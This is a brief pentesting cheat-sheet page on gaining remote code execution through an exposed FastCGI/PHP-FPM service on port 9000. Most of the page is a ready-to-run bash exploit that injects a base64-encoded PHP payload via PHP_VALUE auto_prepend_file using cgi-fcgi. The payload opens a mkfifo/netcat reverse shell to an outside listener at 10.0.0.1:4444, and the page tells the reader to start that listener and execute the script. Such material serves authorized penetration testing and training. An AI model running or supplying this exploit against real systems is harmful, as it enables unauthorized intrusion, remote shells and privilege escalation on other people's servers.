FastCGI Pentesting
Last modified: 2023-04-10
Network
Privilege Escalation
FastCGI is a binary protocol for interfacing interactive programs with a web server. It uses 9000 port by default.
Investigation
If the PHP-FPM (FastCGI Process Manager) is running on the target system, we might be able to execute arbitrary command.
ps aux | cat
php-fpm: pool username
Remote Code Execution
Reference: https://book.hacktricks.xyz/network-services-pentesting/9000-pentesting-fastcgi
We need to create an arbitrary PHP file somewhere. For instance,
touch /dev/shm/index.php
Then create a shell script named "exploit.sh".
#!/bin/bash
PAYLOAD="<?php echo '<!--'; system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f'); echo '-->';"
FILENAMES="/dev/shm/index.php" # Exisiting file path
HOST=$1
B64=$(echo "$PAYLOAD"|base64)
for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT
cat $OUTPUT
done
Now execute the shell script. Of course we have to start a listener in local machine for reverse shell before executing the following command.
chmod +x exploit.sh
./exploit.sh